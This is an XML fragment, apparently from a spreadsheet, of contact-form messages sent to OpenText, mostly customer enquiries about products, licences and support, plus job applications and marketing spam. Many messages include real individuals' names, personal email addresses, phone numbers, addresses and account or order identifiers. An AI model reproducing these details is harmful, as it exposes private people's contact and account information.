When we zooming a .tiff file, we see some of rupteres breaking images. _x000D_
Can you inform about fixing this issue?_x000D_
Thank you very much.</t>
  </si>
  <si>
    <t>Einführung einer digitalen Personalakte &gt;&gt; Präsentationstermin</t>
  </si>
  <si>
    <t>How much is the single user license for brava dwg viewer and is there any compulsory ongoing fees or can I pay one price and use the product forever (with the understanding that over time product support may not be available without additional charges etc)</t>
  </si>
  <si>
    <t>Please reply it about the following_x000D_
1. is the commercial use possible?_x000D_
2. Is the license free?</t>
  </si>
  <si>
    <t xml:space="preserve">Renewal quote request for our customer Primary Health Care Limited._x000D_
They currently have Opentext IXOS Maintenance._x000D_
Requirements: _x000D_
_x000D_
1.	3 years support with options to extend to 4 and 5 years._x000D_
2.	PROACTIVE MANAGEMENT that the vendor can provide to the customer._x000D_
3.	Vendor to list any additional or adhoc proactive services that may apply during the 3 year term._x000D_
4.	Who our vendor Account manager is for this opportunity. The customer wants to have direct contact and access with the vendor product team should it be required._x000D_
5.	Provide all quotes in Australian Dollars AUD$._x000D_
6.	Provide full datasheets for all products quoted_x000D_
7.	Provide DOCUMENTATION for Support and Maintenance including SLA’s._x000D_
8.	Provide any TRAINING SERVICES offerings the vendors can supply to the customer_x000D_
_x000D_
END USER DETAILS: _x000D_
PHCL Contact Officer _x000D_
Name: 	 Wayne Sandy_x000D_
Email:	wayne.sandy@primaryhealthcare.com.au_x000D_
Mobile:	0419237098_x000D_
Address: 	L1, 30-38 SHORT Street, LEICHHARDT New South Wales 2040_x000D_
ABN:	24 064 530 516_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I Contact For Job._x000D_
I Recently Worked In WorkVize PVT LTD _x000D_
As a Marketing Executive._x000D_
WorkVize Is Software Development Company In Pakistan WorkVize Offering​ A 100% Customized Software Solution._x000D_
I work as marketing Executive Sales and Marketing _x000D_
I feel Very Owner to Work with Open Text._x000D_
I want to More Groom And make More Powerful My SkillS._x000D_
REGARDS: SHAHZAD HASHMI_x000D_
HASHMIANS007@GMAIL.COM_x000D_
+923087260877_x000D_
KAMONKE,PUNJAB, PAKISTAN</t>
  </si>
  <si>
    <t>I would like to know how long should I schedule for training and Implementation of complete system like Documentum (previously used on oil and gas projects with WorleyParsons) this current use would be for construction project in Kazakhstan</t>
  </si>
  <si>
    <t>I am a previous Vignette customer for many years in the UK as the founder of 365 Media Group PLC (BSkyB acquired), would like to learn more about the DAM features of Opentext for new investment here in USA</t>
  </si>
  <si>
    <t>I want to buy a supplement called Mono DHEA</t>
  </si>
  <si>
    <t>OpenText acquired Documentum/Captiva.  Captiva was acquired by ActionPoint, which took its name.  I was the CEO of ActionPoint at the time we acquired Captiva.  Can I have the domain back?  (www.actionpoint.com)  The ActionPoint name is long gone from any Captiva/Documentum materials, and the URL is not even forwarded anymore.  Thanks!</t>
  </si>
  <si>
    <t>I am a contractor for the FRB of Richmond that works for DXC Technologies. We purchased Exceed under PO P13458815 (Invoice SUS08457686) and I have been requested to download the software and install it on our systems. I have registered on your Knowledge Base site and am not able to access the software. As part of the registration I provided the System ID (66524-12303), End User number (EU0187022) and my FRB email. I also included that my co-worker is Angela Jackson, who is the person that placed the order. Please advise what I need to do next to be able to download the software and perform my install. I have also clicked on the Confirm Email link sent to me. Thank you, Lance Ellinghaus.</t>
  </si>
  <si>
    <t>looking for jobs that could use my experience in the field of I.t. tech.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir /Madam_x000D_
_x000D_
Please find attached _x000D_
_x000D_
Thankyou _x000D_
_x000D_
Ravindher_x000D_
_x000D_
C:8500886060_x000D_
</t>
  </si>
  <si>
    <t>Looking for job opportunity in Software Testing profile.Having 4+ years experience Software Testing profile both Manual and Automation in various domain</t>
  </si>
  <si>
    <t>I am planning to by a Desktop version - but need clarification on the meaning of symbols included in the SKU column in the listing shown on the Informative Graphics Store page (e.g. - TX, TXL, CXL, a.s.o.)</t>
  </si>
  <si>
    <t>Document Management for 60 person Law Firm</t>
  </si>
  <si>
    <t xml:space="preserve">Sub- SaaS Contacts_x000D_
_x000D_
Hi,_x000D_
 _x000D_
Hope you doing well!_x000D_
 _x000D_
Would you be interested in acquiring Verified Email List of SaaS User across USA. _x000D_
_x000D_
We maintain 1,23,183 Leads with full contact information like Company Name, Full Name, First Name, Last Name, Email Address, Phone Number, Mailing Address, Title, Website, Employees, Revenue etc with unlimited usage license._x000D_
_x000D_
If you have any other targeted criteria, Please let me know so that I can assist you with the count and costs information._x000D_
_x000D_
Looking forward to hear from you soon_x000D_
_x000D_
Regards,_x000D_
Olivia Jones,_x000D_
Marketing Executive_x000D_
_________________________________________x000D_
To remove from this mailing: reply with subject line as "leave out."_x000D_
</t>
  </si>
  <si>
    <t>We have a request for proposal for an Outsourcing of Secure Fax Services for the University of Illinois (all campuses).  May I please have the name and address of the person at your company that this document may be sent to?  Thank you.</t>
  </si>
  <si>
    <t>We have a Req</t>
  </si>
  <si>
    <t xml:space="preserve">Hello!_x000D_
_x000D_
Does your company have an eye-catching functional display for the DIA 2017, June 18-22 in Chicago? Perhaps you need a new look for all of your 2017 trade shows and events. Let us help you be extraordinary with a display that will make you stand out from the crowd._x000D_
In many cases we can provide a sharp custom high quality rental booth for a complete cost that is less than what you pay the exhibit house you normally deal with for properties that you own. We also have outright purchase options available._x000D_
We are a full service display builder for conventions across the country. We can build you a new attractive booth (from a pop-up that one person could set up in 15 minutes, to a complex double deck or anything in between), provide you with a custom rental or purchase solution, order all of your show services, and take care of your installation and dismantling, so all you and your team have to do is show up for the show and focus on your objectives. Trade shows don't have to be difficult or confusing! _x000D_
_x000D_
We offer a wide array of products and services. Look us up online at www.otesinc.com , and let us know how we can help you have an Outstanding Tradeshow!_x000D_
</t>
  </si>
  <si>
    <t>I need access to My Support for SUID 02406-12273</t>
  </si>
  <si>
    <t>I've tried a couple of time to download brava reader but never received an email  with the link to download.</t>
  </si>
  <si>
    <t>Please remove me from May 11, 2017 WebReports course (2-0117 WebReports Design I v10.5 SP1). I will sign up for the newer CS16 version shortly. Please confirm removal from the May 11, 2017 course by email with me, thanks (bsingh@opentext.com)._x000D_
_x000D_
- Bhupinder</t>
  </si>
  <si>
    <t>We are an Dell / EMC reseller who sold Documentum to our customers.  Now with the acquisition of Opentext and Documentum I am trying to find out how we can continue to support, quote and sell Documentum to our customers._x000D_
_x000D_
Regards_x000D_
Shawn Olds_x000D_
949-233-8554 Cell_x000D_
951-220-7096 Office</t>
  </si>
  <si>
    <t>Trying to pay for renewal online with credit card; site says my "account won't grant me access to this resource"</t>
  </si>
  <si>
    <t>Renewal Quote Request</t>
  </si>
  <si>
    <t xml:space="preserve">My company purchased Cognos TM1 several years ago.  Do you have a product will similar capabilities?  </t>
  </si>
  <si>
    <t>I need to make a payment arrangement on an account that we have with your company. Account Number: 864761. The company has been going through a new invoice processing system, which has been the delay in payment being rendered. But I wanted to advise that the amount will be remitted to your office within the next week. So please don't interrupt the services that we have with your company.</t>
  </si>
  <si>
    <t>I am unsure if this question should go through EMC or here so please excuse me if this is the wrong point of contact. _x000D_
_x000D_
We currently have a process ready to go that will email AX with a single pdf attachment, along with the employees Name and ID number in the body of the email. The attachment is a signed agreement form that would need to be indexed within an existing Document Manager application._x000D_
_x000D_
I was told by EMC that this could be accomplished with Application Xtender Office (AXO). So I am contacting you to confirm this and perhaps set up a demo to see if it's something we might be interested in. _x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>Implement Right Fax Barcode routing</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Opentext,_x000D_
_x000D_
I hope you are doing well. I got your email id from Google._x000D_
_x000D_
My name is Ashleigh Michelsen and I am outreach executive of The Contributors Org. We provide guest posting services. I would like to inform you that, We are now working for the most popular weblogs like behance / cafemom / HR / Martindale / Lerablog / archielovers and much more. _x000D_
_x000D_
If there is any opportunity for me, please feel free to get in touch._x000D_
_x000D_
Thanks,_x000D_
Ashleigh_x000D_
</t>
  </si>
  <si>
    <t>Receving a error when we try to intsall bravo reader. Please refer to the error message below_x000D_
windows version prior to windows 10 require windows update KB2999226 for universal crt before using this product. setup will abort</t>
  </si>
  <si>
    <t xml:space="preserve"> Looking into OCR capabilities</t>
  </si>
  <si>
    <t>Reader Purchase</t>
  </si>
  <si>
    <t>Data Archiving for SAP.</t>
  </si>
  <si>
    <t>Hi. I registered a new account and want to be able to download CS16 for testing.(https://knowledge.opentext.com/knowledge/llisapi.dll/open/16534305). I am working for CGI Netherlands who should have an account with OpenText and my client is currently Gemeente Amsterdam (should also have an account). I guess there is something with the account which need to be linked to the CGI account_x000D_
_x000D_
Kind Regards</t>
  </si>
  <si>
    <t>I need to speak with someone in regards to an Exceed MNT quote.</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently using RightFax. We are considering changing from using an on-premises fax gateway to cloud and I want to find out what that costs and how we would go about it. </t>
  </si>
  <si>
    <t>I downloaded the new vision but still can not use it. it kept let me go for updating</t>
  </si>
  <si>
    <t>I tried several times to get Brava reader free, but I do not get a link e-mailed to me.  I checked junk, spam, clutter and of course inbox.  Nothing.  Can you send me a link?  Mike@zenerecompanies.com_x000D_
Please and thank you</t>
  </si>
  <si>
    <t>Need to generate on-demand PDF/UA accessible PDFs from our enterprise software (currently SQL to Crystal Reports).</t>
  </si>
  <si>
    <t>Veranstaltungen in Deutschland</t>
  </si>
  <si>
    <t>Looking for solution fax to email</t>
  </si>
  <si>
    <t>We are moving from traditional telephony to Skype for Business for our university. As a part of that move we are planning to replace PRI's with SIP trunking. Knowing that fax and SIP don't always play well together we are looking at options for our campus fax machines.</t>
  </si>
  <si>
    <t>We currently have Scorecard 10 sp3 and are moving to Metrics Management.  In order to move the database I believe we need to upgrade the database in situ then run the import / export wizard.  Can we just run the upgrade then do a backup restore to move the database?_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Can you please send me the link.  I have been waiting for a link to download the free DXF viewer.  </t>
  </si>
  <si>
    <t>Dear team,_x000D_
_x000D_
Hope you are doing well._x000D_
_x000D_
I thought you might like to know some reasons why you are not getting enough website hits/visitors and conversion._x000D_
_x000D_
My name is Ariana  and I am the Business Devlopment Manager of a digital marketing company. As per my analysis, your website is not performing well in the Google, Yahoo and Bing organic searches._x000D_
_x000D_
Also your traffic flow has dropped from last couple of months due to some of the reasons. You might know about recent Google PENGUIN 4.0 (Algorithm) UPDATES._x000D_
_x000D_
Google has completely dropped all authorship functionality from the search results and webmaster tools. So be careful on it and give us such responsibility to fix it._x000D_
_x000D_
• Some of the aspects given below:_x000D_
• Due to massive and low PR link building._x000D_
• Relevant keyword phrases are not visible on Google first page._x000D_
• Due to HTML validation errors and warnings present in website._x000D_
• Your website is not search engine friendly and not mobile responsive._x000D_
• Website content need to be revised._x000D_
• Website is having on-page and on-site issues._x000D_
• Lack of social media promotion._x000D_
_x000D_
Area of Improvement:_x000D_
_x000D_
• We will give you 1st page ranking on Google, Yahoo, and Bing of your relevant keywords._x000D_
• Improve your organic traffic and make strategy for conversion._x000D_
• Fix your broken link issues and creating Incredible Content That Earns Links_x000D_
• Secure your website from Google penguin and panda updates._x000D_
• Target your local market to increase the direct sales._x000D_
• Co-Citation Links_x000D_
• Create an SEO Strategy That Maps to an Audience_x000D_
_x000D_
Note: We give guarantee to improve in your keyword ranking from the first month itself, if we fail to achieve then we will give additional one month free service._x000D_
_x000D_
We will be optimizing your website in the major search engines like: Google, Yahoo &amp; Bing which results in improvements in keyword ranking, traffic, link popularity, goal conversion, and ROI in the first month of our work._x000D_
_x000D_
_x000D_
To get a free website audit report or quote, please</t>
  </si>
  <si>
    <t>I Need To update The Free Brava Free DWG Viewer.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We can promote your website on google by doing SEO of your website at a very low cost of just $99 per month onwards. _x000D_
 _x000D_
If you would like to know more about this, please send a quick email to us._x000D_
_x000D_
Best_x000D_
Betty | Marketing Executive_x000D_
Skype: ranksindia</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We can promote your website on google by doing SEO of your website at a very low cost of just $99 per month onwards. _x000D_
 _x000D_
If you would like to know more about this, please send a quick email to us._x000D_
_x000D_
Best_x000D_
Billy  | Marketing Executive_x000D_
Skype: ranksindia</t>
  </si>
  <si>
    <t>I downloaded the free Brava! Reader software, unfortunately I am unable to install as the installer is built for window 10 based on the pop up that came while installing._x000D_
Currently my company is using window 7, could you please advise or provide an installer that can be run on window 7._x000D_
Thank you and hope to hear from you soon.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I am the one heading the Main office here in Makati. For any training need, please feel free to contact me and I am glad to assist you._x000D_
Looking forward to see your colleagues in our training program. Thank you_x000D_
</t>
  </si>
  <si>
    <t>Good Day._x000D_
_x000D_
We would like to take this opportunity to invite your company to be one of our Partner in our upcoming events._x000D_
_x000D_
May we know the following details of the right person to connect with regarding the opportunity?_x000D_
_x000D_
Name_x000D_
Title_x000D_
Email Address_x000D_
Contact Number_x000D_
_x000D_
For inquiries, you may reach us at 802 2038 or events@mediafocus.com.ph_x000D_
_x000D_
Thank you and we look forward for your favourable response</t>
  </si>
  <si>
    <t>We are a licensee and we require support on Redact-It Enterprise Server.  Who do we need to contact?  Our past licensing contact emails are no longer valid.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
I am writing to check if you would be interested in an email marketing list of below Technology Professionals titles from various industry sectors._x000D_
_x000D_
We have recently compiled and verified a database of Technology Professionals with complete contact information and the list is good for email marketing, tele-marketing and direct mailing._x000D_
 _x000D_
•	CTO/Technical Lead_x000D_
•	Purchasing Head_x000D_
•	Marketing Managers_x000D_
•	Directors/CEO_x000D_
•	Rearch &amp; Development_x000D_
•	Head of Sales &amp; Business Development_x000D_
_x000D_
We can help you with: Contact name, Company name, Job Title / Specialty, Website, Industry, SIC Code, Email address, Direct mail address, Telephone number, Revenue Size, Employee Size, etc…_x000D_
Let me know if you are interested in seeing few samples of the actual database along with counts and cost with other list details._x000D_
In case, you are not the decision maker on this, please guide me to the right contact._x000D_
Looking forward to hearing from you._x000D_
Regards,_x000D_
Sherry Wilson._x000D_
Online Marketing Executive_x000D_
_x000D_
SERVICES -Consumer List | Technology List | Healthcare list | Event Promotion | Email Appending | Email Campaigns | SEO |Content writing| Telemarketing services._x000D_
_x000D_
If you don't wish to receive our newsletters, reply back with "Leave-Out" in subject line._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am looking to convert CoCreate ME10 (.mi) files to dxf format and was told that OpenText (old Imagenation by Spicer) may be able to help.  Can you confirm and if yes, advise how to obtain the software._x000D_
Thanks_x000D_
Kerry</t>
  </si>
  <si>
    <t xml:space="preserve">Necesito precios de licencia por usuario y el add-in para Outlook cliente._x000D_
</t>
  </si>
  <si>
    <t>We are looking to upgratde feature packs to work with Windows 10, or if our version is no longer supported, upgrade versions. I was looking for a little support, to see if we can do an in place upgrade and if there were any pre steps I should take.</t>
  </si>
  <si>
    <t xml:space="preserve">ATTN:  MARKETING_x000D_
RE: DIA  2017_x000D_
_x000D_
_x000D_
Dear Exhibitor,_x000D_
_x000D_
DIA 2017 is coming up, if you already have a quote from another company we could possibly give you a discount, don’t take the first quote that you receive, let us send you a free comparison quote. We specialize in certain areas from high end, simple or turnkey,  we can deliver with flooring, booth design and labor rolled into one or we can provide our services separately based on your needs.  We pride ourselves on competitive pricing, customer satisfaction, consistency and value. It’s not just a tradeshow and impressions do make a difference. You do have the choice of an EAC (Exhibitor APPOINTED Contractor) not just the general contractor for your booth needs._x000D_
_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Erin Mccormack_x000D_
Account Executive_x000D_
_x000D_
 _x000D_
Floor Space, Inc. _x000D_
“Out of this world event flooring”_x000D_
_x000D_
3749 E. 150 SO. ∣ TIPTON,  IN.  46072_x000D_
765-513-4763 Mobile_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for information on EDI services, that integrates with a produce sales software.  We are involved in produce (product) sales and marketing.  </t>
  </si>
  <si>
    <t>Need help to ship 3rd party billing shipping through walmart partner portal_x000D_
_x000D_
please email a quote, thanks</t>
  </si>
  <si>
    <t>We are an IT company , for now I have to evaluate Nuxeo and an other ECM Solution , the goal is to choose which solution to put on our Service Catalog for our customers. we are interested by Documentum. _x000D_
Is it possible to put me on contact with frensh speaking person?</t>
  </si>
  <si>
    <t>Looking job change</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
I am trying to establish a point of contact to discuss some EDI issues we are experiencing with one of our intermediaries, RBS Independent Financial Services Ltd. I was advised by our offshore EDI team to speak to their designated software provider Plum Software, who didn't have a clue and advised I speak to you. I called and the girl I spoke to didn't have a clue either and put me through to someone in America, who promptly transferred me to an answering machine..._x000D_
_x000D_
Do you have a contact number or email for someone in some kind of technical support team who might actually know what I'm talking about?_x000D_
_x000D_
Cheers,_x000D_
Paul</t>
  </si>
  <si>
    <t xml:space="preserve">Having issues sending faxes. </t>
  </si>
  <si>
    <t>I would like to speak with a Sales Rep about your ECM solution</t>
  </si>
  <si>
    <t xml:space="preserve">I need to request a quote for some Exceed on Demand Named License (Electronic) licenses (SKU: S-EXMXO396101M-0). Maybe 15 or 20 licenses._x000D_
Necesito solicitar una cotización para obtener 15 o 20 licencias Exceed on Demand Named License (Electronic) (SKU: S-EXMXO396101M-0) </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,  _x000D_
Would you be interested in acquiring Real Estate Agents Updated Contacts for your marketing initiatives? We maintain recently updated contacts with email addresses of Real Estate Agents across USA, UK , Canada, New Zealand and Australia._x000D_
Our Data fields: First Name, Last Name, Job Title, Email Address, Company, Address, City, State/Province, ZIP/Postal Code, Country, Phone, Fax, Web Address._x000D_
_x000D_
These lists will be delivered for your perpetual use at one-time cost._x000D_
Look forward to hearing from you._x000D_
_x000D_
Regards,_x000D_
John Edward_x000D_
Business Development Executive_x000D_
UpdatedContacts/http://updatedcontacts.com/_x000D_
Email ID :  John@updatedcontacts.com_x000D_
To opt out reply with ‘Unsubscribe’ in the subject line._x000D_
</t>
  </si>
  <si>
    <t>I am a student working on a project. I just need to know the monthly cost for a hosting service through Open Text. Thank you so much for your time!</t>
  </si>
  <si>
    <t>Would like update/ license for Brava! Reader.</t>
  </si>
  <si>
    <t>Requirements question for an older version of Metastorm (Version 7)._x000D_
Currently we run on a Windows 2003 server can this version run on a higher operating system 2008 R2 or higher</t>
  </si>
  <si>
    <t xml:space="preserve">Can we please have a copy of the free version. Many thanks </t>
  </si>
  <si>
    <t>We currently use RIghtFax 9.4 and we are completely down.  I want to talk to someone about our options on getting upgraded to the next gen of faxing.</t>
  </si>
  <si>
    <t>Need quotation for RightFax Enterprise Suite</t>
  </si>
  <si>
    <t>We're shopping for an electronic document management and archiving solution that will integrate seamlessly with our current ERP application to form a seamless connected and process oriented organization.</t>
  </si>
  <si>
    <t>I am looking for official documentation for ApplicationXtender 5.2. In particular, I need the data dictionary for this version of the application. Any help you can provide would be greatly appreciated.</t>
  </si>
  <si>
    <t>I need to buy 6 additional Brava Desktop same version as the one I purchased yesterday</t>
  </si>
  <si>
    <t>Sou analista de soluções na MRS Logística e estamos buscando uma solução de ECM. Gostaria de realizar um contato com vocês para verificarem se nossos requisitos funcionais e técnicos são atendidos pelo produto de vocês._x000D_
_x000D_
Desde já agradeço e aguardo contato.</t>
  </si>
  <si>
    <t>We are researching different document management and collaboration solutions. I would like some help navigating solutions provided by Open Text to narrow down what would be the best fit for our needs._x000D_
Thanks,_x000D_
Kandis</t>
  </si>
  <si>
    <t>investigating document management systems</t>
  </si>
  <si>
    <t>Hallo,_x000D_
wie bekomme ich ein Update für den FreeDWG Viewer._x000D_
Ich nutze Build: 16.0.2.22 Package: 16.0.2.11_x000D_
_x000D_
An update for Brava! FreeDWG Viewer will be required within 12 days._x000D_
Please contact your supplier for an update._x000D_
_x000D_
Danke</t>
  </si>
  <si>
    <t xml:space="preserve">add a new Vendor Code to our Catalogue account 010062139076 Munro &amp; Company, Inc._x000D_
</t>
  </si>
  <si>
    <t>I sent out forms requesting a response back and the fax number that was included on the form was incorrect. Forms were sent to an alternative fax number rather than returned to me. Looking to get the forms those forms forwarded to me from the incorrect fax. I have sent a fax to that number in hopes they can assist but am in a time crunch. Is it possible if I show you the forms, you can view the archive received on their fax to forward to me? The incorrect fax which received my documents is 216-201-7714 and my correct fax number is 216-201-5076. _x000D_
_x000D_
Please contact me via email as primary and phone as secondary. Thank you.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Please we need prices for below items to one of our governmental universities._x000D_
1- RightFax Business Server - QTY 1_x000D_
2- -	FOIP Enabled channels license - QTY 8_x000D_
3- RightFax PDF Module - QTY 1_x000D_
4- RightFax Office 365 Module_x000D_
5- Unlimited Users (No Users License)._x000D_
6- RightFax Web Access Client "WebUtil"_x000D_
7- RightFax FaxUtil client tool_x000D_
8- Welcome message for auto-routing._x000D_
9- RightFax Reporter tool_x000D_
10- Alerting and Monitoring Functionality _x000D_
11- RightFax and DMS System Integration for fax Automation_x000D_
12- One Year OpenText Software Assurance_x000D_
_x000D_
Squareone Standard Support Level including:_x000D_
-	RightFax Server Support incidents as "STD Support"._x000D_
-	SquareOne Local Support for One Year._x000D_
-	Remote support from SquareOne Support Center._x000D_
-	5x8 Support_x000D_
-	One Year Support Contract Implementation &amp; configuration Onsite - Admin Training for two session_x000D_
Onsite - End User Training for tow session_x000D_
_x000D_
Kind regards_x000D_
Tamer</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
We currently have an outdated and in-supported license for your system and are experiencing some issues with the data grabber.  Can you please advise on who I can contact to try and get some technical support?_x000D_
_x000D_
The errors we are receiving are below_x000D_
_x000D_
DataGrabber Release 9.0 (Build 000.206) (English)_x000D_
Copyright (C) 2011, Opentext, Inc.        Data File: u:\tdf data capture\accounts payable 2\rebuild\csv 11.04.2017_bmc.csv_x000D_
  Definition File: z:\accounts payable\accountspayable.def_x000D_
         Log File: \\tpfggfalchemy1\alchemy databases\allianz\alchemy dbs\accountspayable\datagrab.log_x000D_
_x000D_
Records Processed: 1             Completed: .2%        Elapsed Time: 00:00:00_x000D_
DataGrabber Error: Processing terminated due to an application error._x000D_
_x000D_
I have tried to import the same file into a new database and these seems to work fine which seems to rule out the application and the data to be imported.  My suspicion is with the database but unsure on what I can do to try and resolve, we are able to search/browse the database from within the administrator without any issues._x000D_
_x000D_
Thanks_x000D_
Sat.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
da ich zukünftig in unserem Haus zusätzlich zu Hr. Ulrich Paula unsere ECM Systeme betreuen werde wäre ich an der folgenden Schulung interessiert:_x000D_
3-0188 OpenText Content Server System Administrator v16_x000D_
_x000D_
Ich würde Sie bitten mich diesbezüglich zu kontaktieren bzw. mir diesbezüglich ein Angebot zukommen zu lassen._x000D_
_x000D_
Vielen Dank._x000D_
_x000D_
Mit freundlichen Grüßen _x000D_
Dominik Sandner</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I am based in the UK and I am advising an Integrator company in Benin about executing a Forms 6i application on a browser_x000D_
I found your product OpenText Composer CipherSoft on Internet, which could convert Forms 6i to ADF._x000D_
I would like to have a quote or an idea of how much your software could cost._x000D_
_x000D_
Thanks_x000D_
Frank. </t>
  </si>
  <si>
    <t>i would like to be super user/expert i Alchemy and are told that you can offer training, are you able to offer courses for me? and what would you suggest that i do?_x000D_
kind regards Henrik Jensen</t>
  </si>
  <si>
    <t>Purchased Brava Reader CXL 20th April @ 09.00 transaction No 2SG756289M915154A ORDER nO 182483 ITEM nO 182483 $174.00 US. I have received e mail receipt of payment immediately, and as yet no instructions on how to obtain the programme or how to register validate and install. I would have expected this quite quickly. When should I receive this notification?</t>
  </si>
  <si>
    <t>I need to update my free DWG viewer, can you send me an update please</t>
  </si>
  <si>
    <t xml:space="preserve">We intend to buy Actuate PDF Accessibility Solution for our organization in USA. Need price details. </t>
  </si>
  <si>
    <t>Knowledge sharing</t>
  </si>
  <si>
    <t>We have OpenText Socks Client in our system but when we tries to load a profile it gives an error as "you don't have permission to perform the requested operation", we are not sure how to act on it.Please help me!!!!</t>
  </si>
  <si>
    <t>16.2 sürümünde a0 boyutlu tif uzantılı imajları çok kasıyor. faydalı bir sürüm olmamış.</t>
  </si>
  <si>
    <t>Job Hiring</t>
  </si>
  <si>
    <t>I used to use gupta forums because, I am developing application using Team Developer 6.3 which I bought license from Gupta Technologies. I need to access my support but I do not have any contract with Gupta.</t>
  </si>
  <si>
    <t xml:space="preserve">I am unable to register on Customer Support. We have a Production issue for State of North Dakota. I wanted to raise a support ticket . Since I don't have Support account I am unable to do it .. _x000D_
_x000D_
I don't have details line " End user number , System Id , " I think no one from the project has registered for Customer Support Earlier. _x000D_
_x000D_
Please help me to raise a Support Ticket </t>
  </si>
  <si>
    <t>Wanted to know how many language does VIM support? Does it support languages like Chinese, French, Spanish etc. etc. Please provide details or Call me @ +91-9900718273</t>
  </si>
  <si>
    <t>Access documentation</t>
  </si>
  <si>
    <t>Looking for document for MAC platform. Let me know what you have.</t>
  </si>
  <si>
    <t>We need help producing and testing accessible PDFs for publication to a Canadian website.</t>
  </si>
  <si>
    <t>We had a demo of a Brava SharePoint collaboration tool 2 years and are looking for another demo of that product. We are looking for a tool that will allow us to collaborate, mark-up and secure PDF documents for engineering squad checks. If there was a plug-in that we could use on our existing SharePoint site, it would be best. Would you be able to provide a demo is short order?</t>
  </si>
  <si>
    <t>We're using Liquid Office...planning to develop a new process, wanted to know if you can provide any training for our Developers/Engineers.</t>
  </si>
  <si>
    <t xml:space="preserve">Do you sell the RecoStar ICR/OCR engine/API?   </t>
  </si>
  <si>
    <t>I have been told that Exceed onDemand Client for x86 (Version: 13.8.7.844) with not work with SUSE Linux Enterprise Server 12 (SLES 12).  Is this true?  If so, do we need to use ETX with our SLES 12 systems?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I was wondering if you can forward me to the right person in your company. My name is Nini and I am with Las Vegas Tradeshow Production. I see that your Company is exhibiting at CCW Conference &amp; Expo on June 26-30, in Las Vegas. I would like to send over some information about tradeshow-related services that we offer. _x000D_
I would appreciate it if you can direct me to the right person or department. Thank you so much for your time. _x000D_
Looking forward to hearing from you. _x000D_
Best,_x000D_
Nini Weitz_x000D_
24 Seven Productions | Tradeshow_x000D_
Tradeshow Assistant _x000D_
4065 West Mesa Vista, Suite E, Las Vegas, NV 89118_x000D_
O: 702.731.2470 x118│  www.24SevenPro.com_x000D_
 www.LasVegasTradeshowProduction.com |  _x000D_
</t>
  </si>
  <si>
    <t>Setup a new customer support account; using the contact form didn't work; I am a colleague of Walt Crosby and I will be working on OpenText going forward so I should be added to the support list.</t>
  </si>
  <si>
    <t xml:space="preserve">Our customer is inquiring about a quote and pricing.  Looking to see if we can quote.  </t>
  </si>
  <si>
    <t>Urgent wish to Purchase</t>
  </si>
  <si>
    <t>Looking for document management with specific needs.</t>
  </si>
  <si>
    <t>Interested in cloud/hybrid fax solution</t>
  </si>
  <si>
    <t>Brava Free Viewer will not update</t>
  </si>
  <si>
    <t>Hi! _x000D_
_x000D_
My name is Patrycja and I'm Polish. I would like to offer you my translation services. I have been working as a professional, full-time English/Spanish/Italian to Polish translator since 2011. I graduated in Tourism Management with a M.A. Degree and I obtained the CPE (Certificate of Proficiency in English) from Cambridge University in 2012 and CILS C2 (Certification of Italian as a Foreign Language. C2 - the advanced level, approaching native speaker level, of linguistic and communicative skills) in 2014._x000D_
_x000D_
I work as a subtitler for SferaStudios (Netflix content) and Matinee._x000D_
_x000D_
I specialise in marketing, law, literature, tourism, fashion, entertainment and film industry._x000D_
_x000D_
I have very flexible working/contact hours and I am available for weekend work. I have access to my emails the whole time. _x000D_
_x000D_
Please let me know if you would like any further information._x000D_
_x000D_
Many thanks for your time._x000D_
_x000D_
Regards,_x000D_
_x000D_
Patrycja Honkisz_x000D_
translator &amp; proofreader_x000D_
patty_hon@hotmail.com_x000D_
+542235351392</t>
  </si>
  <si>
    <t>Edcor Data Services, LLC a current customer is updating our Accounts Payable records and requesting a copy of your W9.  Please forward us a current copy of your W9 for our records.</t>
  </si>
  <si>
    <t>Request demo of Tempo Box</t>
  </si>
  <si>
    <t>Interested in eDocs as a hosted off site solution. Looking for a simple document storage facility to be able to store Office docs, pdfs etc and index by a variety of items including document type, URN, name, address etc nfor easy retrieval..</t>
  </si>
  <si>
    <t xml:space="preserve">I need to configure an actuate report that uses Browser Scripting Control.  The training I attended way back in 2009 had a small portion that discusses BSC.  The training that my colleague attended in 2015 also had a small portion that discusses BSC._x000D_
_x000D_
Do you have a more in-depth training for Browser Scripting Control?_x000D_
_x000D_
Or let me know if you are open to doing custom reports for clients._x000D_
_x000D_
Do contact me for any questions regarding this matter._x000D_
_x000D_
Thank you very much._x000D_
</t>
  </si>
  <si>
    <t>More info about OpenText LiquidOffice. We currently have process 360.</t>
  </si>
  <si>
    <t>I have created an account for OpenText, but I would like access to the support area (like my co-workers: Jim Schroeder, John Kelly &amp; Greg O'Brien).  I am not sure of my company's account information, so didn't know what to put in the boxes when prompted at the support request logon prompts._x000D_
_x000D_
Please either grant my access, or give me the infomation I need to fill in those boxes to complete registration for the support area.  Thank you, Steve</t>
  </si>
  <si>
    <t>i need to update our free brava reader . how do i do that</t>
  </si>
  <si>
    <t>What is the licensing model for the Brava Desktop product?</t>
  </si>
  <si>
    <t>Trying to download Brava Reader.  Having trouble</t>
  </si>
  <si>
